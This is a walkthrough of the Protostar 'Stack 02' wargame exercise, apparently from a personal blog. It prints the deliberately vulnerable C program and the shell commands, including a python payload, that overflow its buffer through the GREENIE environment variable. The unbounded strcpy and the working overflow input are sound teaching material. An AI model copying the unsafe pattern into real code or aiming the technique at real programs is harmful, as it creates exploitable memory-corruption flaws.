Protostar - Stack 02


Let’s take a look at the code of this challenge.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

As we can see, there’s the buffer, modified variable and variable that is loaded from the environment variable GREENIE and copied into the buffer. In addition we have different if statement to satisfy - if(modified == 0x0d0a0d0a).

$ ./stack2
stack2: please set the GREENIE environment variable

But let’s remember the previous challenges and keep in mind that 66 bytes will overwrite 2 bytes from the modified variable. We can now simply export the GREENIE environment variable and assign to it 66 A letters.

What will happen?

$ export GREENIE=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$ ./stack2
Try again, you got 0x00004141

As you can see that’s the same kind of vulnerability as in the previous challenges. Now we can finish it with last commands.

$ GREENIE=`python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"'`
$ export GREENIE
$ ./stack2
you have correctly modified the variable

Keep learning and stay safe! ~ W3ndige